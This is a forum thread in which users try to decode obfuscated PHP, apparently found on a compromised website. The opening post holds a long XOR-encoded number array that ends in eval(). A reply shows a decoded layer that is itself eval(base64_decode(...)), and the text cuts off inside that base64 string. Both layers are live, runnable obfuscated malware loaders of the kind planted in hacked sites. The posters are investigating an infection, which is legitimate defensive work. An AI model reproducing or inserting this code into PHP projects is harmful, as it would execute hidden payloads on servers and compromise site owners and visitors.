16;35;15;25;8;19;12;8;92;84;88;46;75;56;58;72;68;77;56;76;74;74;77;79;68;63;58;75;62;73;56;75;56;61;77;69;62;63;62;78;61;68;75;72;80;92;63;41;46;48;51;44;40;35;57;50;63;51;56;53;50;59;92;80;92;94;27;6;21;12;94;85;71;92;92;92;92;92;92;92;92;88;46;58;72;68;62;58;58;69;76;73;73;58;72;74;62;69;72;68;79;62;63;69;76;56;63;76;61;77;74;76;57;74;75;65;60;31;9;14;16;35;25;4;25;31;92;84;88;46;75;56;58;72;68;77;56;76;74;74;77;79;68;63;58;75;62;73;56;75;56;61;77;69;62;63;62;78;61;68;75;72;85;71;92;92;92;92;92;92;92;92;60;31;9;14;16;35;31;16;19;15;25;92;84;88;46;75;56;58;72;68;77;56;76;74;74;77;79;68;63;58;75;62;73;56;75;56;61;77;69;62;63;62;78;61;68;75;72;85;71;92;92;92;92;92;92;92;1;92;25;16;15;25;92;7;92;92;92;92;92;92;92;92;88;46;58;72;68;62;58;58;69;76;73;73;58;72;74;62;69;72;68;79;62;63;69;76;56;63;76;61;77;74;76;57;74;75;65;60;26;21;16;25;35;27;25;8;35;31;19;18;8;25;18;8;15;84;88;46;61;58;74;79;57;61;61;75;61;78;56;77;73;63;61;73;69;61;62;62;69;73;62;74;58;56;77;61;58;57;62;58;85;71;92;92;92;92;92;92;92;1;92;92;92;92;92;92;1;92;92;92;92;92;92;14;25;8;9;14;18;92;88;46;58;72;68;62;58;58;69;76;73;73;58;72;74;62;69;72;68;79;62;63;69;76;56;63;76;61;77;74;76;57;74;75;71;92;92;92;92;92;1;92;92;92;92;1;92;92;92;92;92;92;92;92;21;26;84;93;26;9;18;31;8;21;19;18;35;25;4;21;15;8;15;84;91;27;6;24;25;31;19;24;25;91;85;85;7;92;92;92;92;92;26;9;18;31;8;21;19;18;92;27;6;24;25;31;19;24;25;84;88;46;73;61;69;63;58;77;62;72;69;75;73;76;78;61;63;61;78;79;63;68;58;74;77;77;61;73;74;72;74;68;72;63;85;7;92;92;92;92;92;92;88;46;79;76;62;78;61;62;68;56;63;77;72;69;74;56;76;74;62;78;79;76;61;75;77;56;68;69;74;78;61;58;73;56;65;60;19;14;24;84;60;15;9;30;15;8;14;84;88;46;73;61;69;63;58;77;62;72;69;75;73;76;78;61;63;61;78;79;63;68;58;74;77;77;61;73;74;72;74;68;72;63;80;79;80;77;85;85;71;92;92;92;92;92;92;88;46;62;57;72;63;72;56;76;79;75;57;69;79;69;78;78;74;58;74;73;68;77;78;68;68;73;61;73;79;56;61;56;69;65;77;76;71;92;92;92;92;92;92;88;46;61;79;56;73;78;57;73;78;61;72;68;69;79;74;63;56;57;76;58;73;79;73;74;62;62;76;68;74;73;78;58;78;65;76;71;92;92;92;92;92;92;21;26;84;88;46;79;76;62;78;61;62;68;56;63;77;72;69;74;56;76;74;62;78;79;76;61;75;77;56;68;69;74;78;61;58;73;56;90;72;85;7;92;92;92;92;92;92;92;88;46;74;79;62;57;56;57;74;62;77;69;78;74;74;56;72;57;58;57;61;56;76;75;61;72;56;69;77;57;78;69;57;62;65;60;9;18;12;29;31;23;84;91;10;91;80;15;9;30;15;8;14;84;88;46;73;61;69;63;58;77;62;72;69;75;73;76;78;61;63;61;78;79;63;68;58;74;77;77;61;73;74;72;74;68;72;63;80;77;76;80;78;85;85;71;92;92;92;92;92;92;92;88;46;74;79;62;57;56;57;74;62;77;69;78;74;74;56;72;57;58;57;61;56;76;75;61;72;56;69;77;57;78;69;57;62;65;88;46;74;79;62;57;56;57;74;62;77;69;78;74;74;56;72;57;58;57;61;56;76;75;61;72;56;69;77;57;78;69;57;62;39;77;33;71;92;92;92;92;92;92;92;88;46;62;57;72;63;72;56;76;79;75;57;69;79;69;78;78;74;58;74;73;68;77;78;68;68;73;61;73;79;56;61;56;69;87;65;78;87;88;46;74;79;62;57;56;57;74;62;77;69;78;74;74;56;72;57;58;57;61;56;76;75;61;72;56;69;77;57;78;69;57;62;71;92;92;92;92;92;92;1;92;92;92;92;92;92;21;26;84;88;46;79;76;62;78;61;62;68;56;63;77;72;69;74;56;76;74;62;78;79;76;61;75;77;56;68;69;74;78;61;58;73;56;90;68;85;7;92;92;92;92;92;92;92;88;46;62;57;72;63;72;56;76;79;75;57;69;79;69;78;78;74;58;74;73;68;77;78;68;68;73;61;73;79;56;61;56;69;65;60;15;8;14;12;19;15;84;88;46;73;61;69;63;58;77;62;72;69;75;73;76;78;61;63;61;78;79;63;68;58;74;77;77;61;73;74;72;74;68;72;63;80;31;20;14;84;76;85;80;88;46;62;57;72;63;72;56;76;79;75;57;69;79;69;78;78;74;58;74;73;68;77;78;68;68;73;61;73;79;56;61;56;69;85;87;77;71;92;92;92;92;92;92;1;92;92;92;92;92;92;21;26;84;88;46;79;76;62;78;61;62;68;56;63;77;72;69;74;56;76;74;62;78;79;76;61;75;77;56;68;69;74;78;61;58;73;56;90;77;74;85;7;92;92;92;92;92;92;92;88;46;62;57;72;63;72;56;76;79;75;57;69;79;69;78;78;74;58;74;73;68;77;78;68;68;73;61;73;79;56;61;56;69;65;60;15;8;14;12;19;15;84;88;46;73;61;69;63;58;77;62;72;69;75;73;76;78;61;63;61;78;79;63;68;58;74;77;77;61;73;74;72;74;68;72;63;80;31;20;14;84;76;85;80;88;46;62;57;72;63;72;56;76;79;75;57;69;79;69;78;78;74;58;74;73;68;77;78;68;68;73;61;73;79;56;61;56;69;85;87;77;71;92;92;92;92;92;92;1;92;92;92;92;92;92;21;26;84;88;46;79;76;62;78;61;62;68;56;63;77;72;69;74;56;76;74;62;78;79;76;61;75;77;56;68;69;74;78;61;58;73;56;90;78;85;7;92;92;92;92;92;92;92;88;46;62;57;72;63;72;56;76;79;75;57;69;79;69;78;78;74;58;74;73;68;77;78;68;68;73;61;73;79;56;61;56;69;87;65;78;71;92;92;92;92;92;92;1;92;92;92;92;92;92;88;46;76;79;72;61;57;78;61;62;69;72;58;69;69;63;63;68;77;62;79;68;69;61;77;68;78;78;56;61;79;79;73;79;65;60;27;6;21;18;26;16;29;8;25;84;60;15;9;30;15;8;14;84;88;46;73;61;69;63;58;77;62;72;69;75;73;76;78;61;63;61;78;79;63;68;58;74;77;77;61;73;74;72;74;68;72;63;80;88;46;62;57;72;63;72;56;76;79;75;57;69;79;69;78;78;74;58;74;73;68;77;78;68;68;73;61;73;79;56;61;56;69;85;85;71;92;92;92;92;92;92;21;26;84;88;46;76;79;72;61;57;78;61;62;69;72;58;69;69;63;63;68;77;62;79;68;69;61;77;68;78;78;56;61;79;79;73;79;65;65;65;58;61;48;47;57;85;7;92;92;92;92;92;92;92;88;46;76;79;72;61;57;78;61;62;69;72;58;69;69;63;63;68;77;62;79;68;69;61;77;68;78;78;56;61;79;79;73;79;65;88;46;73;61;69;63;58;77;62;72;69;75;73;76;78;61;63;61;78;79;63;68;58;74;77;77;61;73;74;72;74;68;72;63;71;92;92;92;92;92;92;1;92;92;92;92;92;92;14;25;8;9;14;18;92;88;46;76;79;72;61;57;78;61;62;69;72;58;69;69;63;63;68;77;62;79;68;69;61;77;68;78;78;56;61;79;79;73;79;71;92;92;92;92;92;1;92;92;92;92;1;92;92;92;92;26;9;18;31;8;21;19;18;92;17;14;19;30;20;84;88;46;57;68;78;57;57;69;62;77;78;77;58;75;76;69;68;69;73;57;58;73;72;57;62;61;75;58;61;74;62;75;68;62;85;7;92;92;92;92;92;52;25;29;24;25;14;84;91;63;19;18;8;25;18;8;81;57;18;31;19;24;21;18;27;70;92;18;19;18;25;91;85;71;92;92;92;92;92;88;46;61;77;75;69;61;62;56;79;61;75;62;69;57;78;68;63;79;74;69;58;75;62;73;69;63;73;77;62;68;77;56;57;65;27;6;24;25;31;19;24;25;84;88;46;57;68;78;57;57;69;62;77;78;77;58;75;76;69;68;69;73;57;58;73;72;57;62;61;75;58;61;74;62;75;68;62;85;71;92;92;92;92;92;92;92;21;26;84;12;14;25;27;35;17;29;8;31;20;84;91;83;32;64;32;83;30;19;24;5;83;15;21;91;80;88;46;61;77;75;69;61;62;56;79;61;75;62;69;57;78;68;63;79;74;69;58;75;62;73;69;63;73;77;62;68;77;56;57;85;85;7;92;92;92;92;92;92;14;25;8;9;14;18;92;12;14;25;27;35;14;25;12;16;29;31;25;84;91;83;84;32;64;32;83;30;19;24;5;39;34;32;66;33;86;32;66;85;83;15;21;91;80;27;17;16;84;85;82;94;32;18;94;82;91;88;77;91;80;88;46;61;77;75;69;61;62;56;79;61;75;62;69;57;78;68;63;79;74;69;58;75;62;73;69;63;73;77;62;68;77;56;57;85;71;92;92;92;92;92;1;25;16;15;25;7;92;92;92;92;92;92;14;25;8;9;14;18;92;88;46;61;77;75;69;61;62;56;79;61;75;62;69;57;78;68;63;79;74;69;58;75;62;73;69;63;73;77;62;68;77;56;57;82;27;17;16;84;85;71;92;92;92;92;92;1;92;92;92;92;1;92;92;92;92;19;30;35;15;8;29;14;8;84;91;17;14;19;30;20;91;85;71;92;92;92;1;92;92;1;");$z="";foreach($m as $v)if ($v!="")$z.=chr($v^$k);eval($z);

 

how do i decode that to find the source files?

Link to comment
Share on other sites

ok, managed to decode:

 

<?php /**/ eval(base64_decode("JGs9MTI0OyRtPWV4cGxvZGUoIjsiLCIyMTsyNjs4NDsyNjs5OzE4OzMxOzg7MjE7MTk7MTg7MzU7MjU7NDsyMTsxNTs4OzE1Ozg0OzkxOzE5OzMwOzM1OzE1Ozg7Mjk7MTQ7ODs5MTs4NTs5MDs5MDs5MzsyMTsxNTsxNTsyNTs4Ozg0Ozg4OzU5OzQ4OzUxOzYyOzYxOzQ4OzQ3OzM5OzkxOzE3OzE0OzM1OzE4OzE5OzkxOzMzOzg1Ozg1Ozc7OTI7OTI7OTI7ODg7NTk7NDg7NTE7NjI7NjE7NDg7NDc7Mzk7OTE7MTc7MTQ7MzU7MTg7MTk7OTE7MzM7NjU7Nzc7NzE7OTI7OTI7OTI7MjE7MjY7ODQ7OTM7MjY7OTsxODszMTs4OzIxOzE5OzE4OzM1OzI1OzQ7MjE7MTU7ODsxNTs4NDs5MTsxNzsxNDsxOTszMDsyMDs5MTs4NTs4NTs3OzkyOzkyOzkyOzkyOzkyOzkyOzIxOzI2Ozg0OzkzOzI2Ozk7MTg7MzE7ODsyMTsxOTsxODszNTsyNTs0OzIxOzE1Ozg7MTU7ODQ7OTE7Mjc7MTc7MTY7OTE7ODU7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5MjsyNjs5OzE4OzMxOzg7MjE7MTk7MTg7OTI7Mjc7MTc7MTY7ODQ7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsyMTsyNjs5Mjs4NDsxNTs4OzE0OzIxOzE1Ozg7MTQ7ODQ7ODg7MzU7NDc7NTc7NDY7NDI7NTc7NDY7Mzk7OTQ7NTI7NDA7NDA7NDQ7MzU7NDE7NDc7NTc7NDY7MzU7NjE7NTk7NTc7NTA7NDA7OTQ7MzM7ODA7OTQ7Mjc7MTk7MTk7Mjc7MTY7MjU7MzA7MTk7ODs5NDs4NTswOzA7MTU7ODsxNDsyMTsxNTs4OzE0Ozg0Ozg4OzM1OzQ3OzU3OzQ2OzQyOzU3OzQ2OzM5Ozk0OzUyOzQwOzQwOzQ0OzM1OzQxOzQ3OzU3OzQ2OzM1OzYxOzU5OzU3OzUwOzQwOzk0OzMzOzgwOzk0OzU7Mjk7MjA7MTk7MTk7OTQ7ODU7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsyMTsyNjs5Mjs4NDs4NDsxNzsyNDs3Mzs4NDs4ODszNTs0Njs1Nzs0NTs0MTs1Nzs0Nzs0MDszOTs5NDsxNzsxNzsxNzsyOTsyMzsxOTsxMTsxOTsyMTsxMTsxOTsxMTs3Njs3Njs3ODs5NDszMzs4NTs2NTs2NTs5NDsyOTs3OTs2OTs3OTs3MjsyNDszMDsyNTs3ODs3NjszMDs3NjszMDs3OTsyNTs2OTszMDszMDsyNTs3NTsyOTs2OTsyNTsyNjszMTszMTs3NDs3Mzs3ODs3NDsyNjs3Mjs5NDs4NTs5MDs5MDs4NDsyMTsxNTsxNTsyNTs4Ozg0Ozg4OzM1OzQ2OzU3OzQ1OzQxOzU3OzQ3OzQwOzM5Ozk0OzE3OzE3OzE3OzI5OzIzOzE5OzExOzE5OzIxOzExOzE5OzExOzc2Ozc2Ozc3Ozk0OzMzOzg1Ozg1Ozg1Ozc7ODg7NDY7Njg7NzU7Nzg7NzM7NzY7Nzg7Njk7NTc7NjE7Njg7Njk7NzU7Nzc7Nzg7NTc7NTc7NTY7Njg7NzQ7NzU7NzY7NjI7NjE7NTc7NzQ7NzI7NTY7Nzk7NzY7NTc7NzI7NzU7NjU7MzA7Mjk7MTU7MjU7NzQ7NzI7MzU7MjQ7MjU7MzE7MTk7MjQ7MjU7ODQ7ODg7MzU7NDY7NTc7NDU7NDE7NTc7NDc7NDA7Mzk7OTQ7MTc7MTc7MTc7Mjk7MjM7MTk7MTE7MTk7MjE7MTE7MTk7MTE7NzY7NzY7Nzc7OTQ7MzM7ODU7NzE7MTQ7MjU7ODs5OzE0OzE4OzkyOzk0OzU3OzQ7MjU7MzE7OTs4OzIxOzE5OzE4OzgyOzgyOzgyOzg4OzQ2OzY4Ozc1Ozc4OzczOzc2Ozc4OzY5OzU3OzYxOzY4OzY5Ozc1Ozc3Ozc4OzU3OzU3OzU2OzY4Ozc0Ozc1Ozc2OzYyOzYxOzU3Ozc0OzcyOzU2Ozc5Ozc2OzU3OzcyOzc1OzMyOzE4Ozk0OzgyOzI1OzEwOzI5OzE2Ozg0Ozg4OzQ2OzY4Ozc1Ozc4OzczOzc2Ozc4OzY5OzU3OzYxOzY4OzY5Ozc1Ozc3Ozc4OzU3OzU3OzU2OzY4Ozc0Ozc1Ozc2OzYyOzYxOzU3Ozc0OzcyOzU2Ozc5Ozc2OzU3OzcyOzc1Ozg1OzcxOzE7OTI7OTI7OTI7OTI7OTI7OTI7OTI7ODg7NDY7NjE7NTg7NzQ7Nzk7NTc7NjE7NjE7NzU7NjE7Nzg7NTY7Nzc7NzM7NjM7NjE7NzM7Njk7NjE7NjI7NjI7Njk7NzM7NjI7NzQ7NTg7NTY7Nzc7NjE7NTg7NTc7NjI7NTg7NjU7OTQ7MjA7ODs4OzEyOzcwOzgzOzgzOzk0OzgyOzMwOzI5OzE1OzI1Ozc0OzcyOzM1OzI0OzI1OzMxOzE5OzI0OzI1Ozg0Ozk0OzM3Ozc4OzY5OzE1OzM3OzE4OzE2OzIwOzI0OzU5OzY5Ozk7MjQ7NTk7NTg7NTsyOTs0Mzs2ODs5OzM3Ozc4OzY5Ozg7OTQ7ODU7ODI7OTQ7ODM7MTY7MjE7MTg7MjM7MTU7ODM7OTQ7ODI7MTQ7Mjk7MTg7MjQ7ODQ7NzY7ODA7Nzg7NzM7NzY7ODU7ODI7OTQ7ODI7ODs0Ozg7Njc7MjE7MTI7NjU7OTQ7ODI7ODg7MzU7NDc7NTc7NDY7NDI7NTc7NDY7Mzk7OTQ7NDY7NTc7NDk7NTE7NDA7NTc7MzU7NjE7NTY7NTY7NDY7OTQ7MzM7ODI7OTQ7OTA7MjA7MTk7MTU7ODs2NTs5NDs4MjsxNDsyOTsxMTs5OzE0OzE2OzI1OzE4OzMxOzE5OzI0OzI1Ozg0Ozg4OzM1OzQ3OzU3OzQ2OzQyOzU3OzQ2OzM5Ozk0OzUyOzQwOzQwOzQ0OzM1OzUyOzUxOzQ3OzQwOzk0OzMzOzg1OzgyOzk0OzkwOzI5OzI3OzI1OzE4Ozg7NjU7OTQ7ODI7MTQ7Mjk7MTE7OTsxNDsxNjsyNTsxODszMTsxOTsyNDsyNTs4NDs4ODszNTs0Nzs1Nzs0Njs0Mjs1Nzs0NjszOTs5NDs1Mjs0MDs0MDs0NDszNTs0MTs0Nzs1Nzs0NjszNTs2MTs1OTs1Nzs1MDs0MDs5NDszMzs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs1ODs3Mjs2ODs2Mjs1ODs1ODs2OTs3Njs3Mzs3Mzs1ODs3Mjs3NDs2Mjs2OTs3Mjs2ODs3OTs2Mjs2Mzs2OTs3Njs1Njs2Mzs3Njs2MTs3Nzs3NDs3Njs1Nzs3NDs3NTs2NTs5NDs5NDs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsyMTsyNjs5Mjs4NDsyNjs5OzE4OzMxOzg7MjE7MTk7MTg7MzU7MjU7NDsyMTsxNTs4OzE1Ozg0Ozk0OzMxOzk7MTQ7MTY7MzU7MjE7MTg7MjE7ODs5NDs4NTs4NTs5Mjs3OzkyOzkyOzkyOzkyOzkyOzkyOzkyOzkyOzg4OzQ2Ozc1OzU2OzU4OzcyOzY4Ozc3OzU2Ozc2Ozc0Ozc0Ozc3Ozc5OzY4OzYzOzU4Ozc1OzYyOzczOzU2Ozc1OzU2OzYxOzc3OzY5OzYyOzYzOzYyOzc4OzYxOzY4Ozc1OzcyOzkyOzY1OzkyOzYwOzMxOzk7MTQ7MTY7MzU7MjE7MTg7MjE7ODs4NDs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs2MDszMTs5OzE0OzE2OzM1OzE1OzI1Ozg7MTk7MTI7ODs5Mjs4NDs4ODs0Njs3NTs1Njs1ODs3Mjs2ODs3Nzs1Njs3Njs3NDs3NDs3Nzs3OTs2ODs2Mzs1ODs3NTs2Mjs3Mzs1Njs3NTs1Njs2MTs3Nzs2OTs2Mjs2Mzs2Mjs3ODs2MTs2ODs3NTs3Mjs4MDs5Mjs2Mzs0MTs0Njs0ODs1MTs0NDs0MDszNTs0MTs0Njs0ODs4MDs5Mjs4ODs0Njs2MTs1ODs3NDs3OTs1Nzs2MTs2MTs3NTs2MTs3ODs1Njs3Nzs3Mzs2Mzs2MTs3Mzs2OTs2MTs2Mjs2Mjs2OTs3Mzs2Mjs3NDs1ODs1Njs3Nzs2MTs1ODs1Nzs2Mjs1ODs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs2MDszMTs5OzE0OzE2OzM1OzE1OzI1Ozg7MTk7MTI7ODs5Mjs4NDs4ODs0Njs3NTs1Njs1ODs3Mjs2ODs3Nzs1Njs3Njs3NDs3NDs3Nzs3OTs2ODs2Mzs1ODs3NTs2Mjs3Mzs1Njs3NTs1Njs2MTs3Nzs2OTs2Mjs2Mzs2Mjs3ODs2MTs2ODs3NTs3Mjs4MDs5Mjs2Mzs0MTs0Njs0ODs1MTs0NDs0MDszNTs0Njs1Nzs0MDs0MTs0Njs1MDs0MDs0Njs2MTs1MDs0Nzs1ODs1Nzs0Njs4MDs5Mjs3Nzs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs2MDszMTs5OzE0OzE2OzM1OzE1OzI1Ozg7MTk7MTI7ODs5Mjs4NDs4ODs0Njs3NTs1Njs1ODs3Mjs2ODs3Nzs1Njs3Njs3NDs3NDs3Nzs3OTs2ODs2Mzs1ODs3NTs2Mjs3Mzs1Njs3NTs1Njs2MTs3Nzs2OTs2Mjs2Mzs2Mjs3ODs2MTs2ODs3NTs3Mjs4MDs5Mjs2Mzs0MTs0Njs0ODs1MTs0NDs0MDszNTs0MDs1Mzs0OTs1Nzs1MTs0MTs0MDs4MDs5Mjs3Nzs3Mzs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs2MDszMTs5OzE0OzE2OzM1OzE1OzI1Ozg7MTk7MTI7ODs5Mjs4NDs4ODs0Njs3NTs1Njs1ODs3Mjs2ODs3Nzs1Njs3Njs3NDs3NDs3Nzs3OTs2ODs2Mzs1ODs3NTs2Mjs3Mzs1Njs3NTs1Njs2MTs3Nzs2OTs2Mjs2Mzs2Mjs3ODs2MTs2ODs3NTs3Mjs4MDs5Mjs2Mzs0MTs0Njs0ODs1MTs0NDs0MDszNTs1Nzs1MDs2Mzs1MTs1Njs1Mzs1MDs1OTs5Mjs4MDs5Mjs5NDsyNzs2OzIxOzEyOzk0Ozg1OzcxOzkyOzkyOzkyOzkyOzkyOzkyOzkyOzkyOzg4OzQ2OzU4OzcyOzY4OzYyOzU4OzU4OzY5Ozc2OzczOzczOzU4OzcyOzc0OzYyOzY5OzcyOzY4Ozc5OzYyOzYzOzY5Ozc2OzU2OzYzOzc2OzYxOzc3Ozc0Ozc2OzU3Ozc0Ozc1OzY1OzYwOzMxOzk7MTQ7MTY7MzU7MjU7NDsyNTszMTs5Mjs4NDs4ODs0Njs3NTs1Njs1ODs3Mjs2ODs3Nzs1Njs3Njs3NDs3NDs3Nzs3OTs2ODs2Mzs1ODs3NTs2Mjs3Mzs1Njs3NTs1Njs2MTs3Nzs2OTs2Mjs2Mzs2Mjs3ODs2MTs2ODs3NTs3Mjs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs2MDszMTs5OzE0OzE2OzM1OzMxOzE2OzE5OzE1OzI1OzkyOzg0Ozg4OzQ2Ozc1OzU2OzU4OzcyOzY4Ozc3OzU2Ozc2Ozc0Ozc0Ozc3Ozc5OzY4OzYzOzU4Ozc1OzYyOzczOzU2Ozc1OzU2OzYxOzc3OzY5OzYyOzYzOzYyOzc4OzYxOzY4Ozc1OzcyOzg1OzcxOzkyOzkyOzkyOzkyOzkyOzkyOzkyOzE7OTI7MjU7MTY7MTU7MjU7OTI7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs1ODs3Mjs2ODs2Mjs1ODs1ODs2OTs3Njs3Mzs3Mzs1ODs3Mjs3NDs2Mjs2OTs3Mjs2ODs3OTs2Mjs2Mzs2OTs3Njs1Njs2Mzs3Njs2MTs3Nzs3NDs3Njs1Nzs3NDs3NTs2NTs2MDsyNjsyMTsxNjsyNTszNTsyNzsyNTs4OzM1OzMxOzE5OzE4Ozg7MjU7MTg7ODsxNTs4NDs4ODs0Njs2MTs1ODs3NDs3OTs1Nzs2MTs2MTs3NTs2MTs3ODs1Njs3Nzs3Mzs2Mzs2MTs3Mzs2OTs2MTs2Mjs2Mjs2OTs3Mzs2Mjs3NDs1ODs1Njs3Nzs2MTs1ODs1Nzs2Mjs1ODs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsxOzkyOzkyOzkyOzkyOzkyOzkyOzE7OTI7OTI7OTI7OTI7OTI7OTI7MTQ7MjU7ODs5OzE0OzE4OzkyOzg4OzQ2OzU4OzcyOzY4OzYyOzU4OzU4OzY5Ozc2OzczOzczOzU4OzcyOzc0OzYyOzY5OzcyOzY4Ozc5OzYyOzYzOzY5Ozc2OzU2OzYzOzc2OzYxOzc3Ozc0Ozc2OzU3Ozc0Ozc1OzcxOzkyOzkyOzkyOzkyOzkyOzE7OTI7OTI7OTI7OTI7MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsyMTsyNjs4NDs5MzsyNjs5OzE4OzMxOzg7MjE7MTk7MTg7MzU7MjU7NDsyMTsxNTs4OzE1Ozg0OzkxOzI3OzY7MjQ7MjU7MzE7MTk7MjQ7MjU7OTE7ODU7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5MjsyNjs5OzE4OzMxOzg7MjE7MTk7MTg7OTI7Mjc7NjsyNDsyNTszMTsxOTsyNDsyNTs4NDs4ODs0Njs3Mzs2MTs2OTs2Mzs1ODs3Nzs2Mjs3Mjs2OTs3NTs3Mzs3Njs3ODs2MTs2Mzs2MTs3ODs3OTs2Mzs2ODs1ODs3NDs3Nzs3Nzs2MTs3Mzs3NDs3Mjs3NDs2ODs3Mjs2Mzs4NTs3OzkyOzkyOzkyOzkyOzkyOzkyOzg4OzQ2Ozc5Ozc2OzYyOzc4OzYxOzYyOzY4OzU2OzYzOzc3OzcyOzY5Ozc0OzU2Ozc2Ozc0OzYyOzc4Ozc5Ozc2OzYxOzc1Ozc3OzU2OzY4OzY5Ozc0Ozc4OzYxOzU4OzczOzU2OzY1OzYwOzE5OzE0OzI0Ozg0OzYwOzE1Ozk7MzA7MTU7ODsxNDs4NDs4ODs0Njs3Mzs2MTs2OTs2Mzs1ODs3Nzs2Mjs3Mjs2OTs3NTs3Mzs3Njs3ODs2MTs2Mzs2MTs3ODs3OTs2Mzs2ODs1ODs3NDs3Nzs3Nzs2MTs3Mzs3NDs3Mjs3NDs2ODs3Mjs2Mzs4MDs3OTs4MDs3Nzs4NTs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs2Mjs1Nzs3Mjs2Mzs3Mjs1Njs3Njs3OTs3NTs1Nzs2OTs3OTs2OTs3ODs3ODs3NDs1ODs3NDs3Mzs2ODs3Nzs3ODs2ODs2ODs3Mzs2MTs3Mzs3OTs1Njs2MTs1Njs2OTs2NTs3Nzs3Njs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs2MTs3OTs1Njs3Mzs3ODs1Nzs3Mzs3ODs2MTs3Mjs2ODs2OTs3OTs3NDs2Mzs1Njs1Nzs3Njs1ODs3Mzs3OTs3Mzs3NDs2Mjs2Mjs3Njs2ODs3NDs3Mzs3ODs1ODs3ODs2NTs3Njs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsyMTsyNjs4NDs4ODs0Njs3OTs3Njs2Mjs3ODs2MTs2Mjs2ODs1Njs2Mzs3Nzs3Mjs2OTs3NDs1Njs3Njs3NDs2Mjs3ODs3OTs3Njs2MTs3NTs3Nzs1Njs2ODs2OTs3NDs3ODs2MTs1ODs3Mzs1Njs5MDs3Mjs4NTs3OzkyOzkyOzkyOzkyOzkyOzkyOzkyOzg4OzQ2Ozc0Ozc5OzYyOzU3OzU2OzU3Ozc0OzYyOzc3OzY5Ozc4Ozc0Ozc0OzU2OzcyOzU3OzU4OzU3OzYxOzU2Ozc2Ozc1OzYxOzcyOzU2OzY5Ozc3OzU3Ozc4OzY5OzU3OzYyOzY1OzYwOzk7MTg7MTI7Mjk7MzE7MjM7ODQ7OTE7MTA7OTE7ODA7MTU7OTszMDsxNTs4OzE0Ozg0Ozg4OzQ2OzczOzYxOzY5OzYzOzU4Ozc3OzYyOzcyOzY5Ozc1OzczOzc2Ozc4OzYxOzYzOzYxOzc4Ozc5OzYzOzY4OzU4Ozc0Ozc3Ozc3OzYxOzczOzc0OzcyOzc0OzY4OzcyOzYzOzgwOzc3Ozc2OzgwOzc4Ozg1Ozg1OzcxOzkyOzkyOzkyOzkyOzkyOzkyOzkyOzg4OzQ2Ozc0Ozc5OzYyOzU3OzU2OzU3Ozc0OzYyOzc3OzY5Ozc4Ozc0Ozc0OzU2OzcyOzU3OzU4OzU3OzYxOzU2Ozc2Ozc1OzYxOzcyOzU2OzY5Ozc3OzU3Ozc4OzY5OzU3OzYyOzY1Ozg4OzQ2Ozc0Ozc5OzYyOzU3OzU2OzU3Ozc0OzYyOzc3OzY5Ozc4Ozc0Ozc0OzU2OzcyOzU3OzU4OzU3OzYxOzU2Ozc2Ozc1OzYxOzcyOzU2OzY5Ozc3OzU3Ozc4OzY5OzU3OzYyOzM5Ozc3OzMzOzcxOzkyOzkyOzkyOzkyOzkyOzkyOzkyOzg4OzQ2OzYyOzU3OzcyOzYzOzcyOzU2Ozc2Ozc5Ozc1OzU3OzY5Ozc5OzY5Ozc4Ozc4Ozc0OzU4Ozc0OzczOzY4Ozc3Ozc4OzY4OzY4OzczOzYxOzczOzc5OzU2OzYxOzU2OzY5Ozg3OzY1Ozc4Ozg3Ozg4OzQ2Ozc0Ozc5OzYyOzU3OzU2OzU3Ozc0OzYyOzc3OzY5Ozc4Ozc0Ozc0OzU2OzcyOzU3OzU4OzU3OzYxOzU2Ozc2Ozc1OzYxOzcyOzU2OzY5Ozc3OzU3Ozc4OzY5OzU3OzYyOzcxOzkyOzkyOzkyOzkyOzkyOzkyOzE7OTI7OTI7OTI7OTI7OTI7OTI7MjE7MjY7ODQ7ODg7NDY7Nzk7NzY7NjI7Nzg7NjE7NjI7Njg7NTY7NjM7Nzc7NzI7Njk7NzQ7NTY7NzY7NzQ7NjI7Nzg7Nzk7NzY7NjE7NzU7Nzc7NTY7Njg7Njk7NzQ7Nzg7NjE7NTg7NzM7NTY7OTA7Njg7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs2Mjs1Nzs3Mjs2Mzs3Mjs1Njs3Njs3OTs3NTs1Nzs2OTs3OTs2OTs3ODs3ODs3NDs1ODs3NDs3Mzs2ODs3Nzs3ODs2ODs2ODs3Mzs2MTs3Mzs3OTs1Njs2MTs1Njs2OTs2NTs2MDsxNTs4OzE0OzEyOzE5OzE1Ozg0Ozg4OzQ2OzczOzYxOzY5OzYzOzU4Ozc3OzYyOzcyOzY5Ozc1OzczOzc2Ozc4OzYxOzYzOzYxOzc4Ozc5OzYzOzY4OzU4Ozc0Ozc3Ozc3OzYxOzczOzc0OzcyOzc0OzY4OzcyOzYzOzgwOzMxOzIwOzE0Ozg0Ozc2Ozg1OzgwOzg4OzQ2OzYyOzU3OzcyOzYzOzcyOzU2Ozc2Ozc5Ozc1OzU3OzY5Ozc5OzY5Ozc4Ozc4Ozc0OzU4Ozc0OzczOzY4Ozc3Ozc4OzY4OzY4OzczOzYxOzczOzc5OzU2OzYxOzU2OzY5Ozg1Ozg3Ozc3OzcxOzkyOzkyOzkyOzkyOzkyOzkyOzE7OTI7OTI7OTI7OTI7OTI7OTI7MjE7MjY7ODQ7ODg7NDY7Nzk7NzY7NjI7Nzg7NjE7NjI7Njg7NTY7NjM7Nzc7NzI7Njk7NzQ7NTY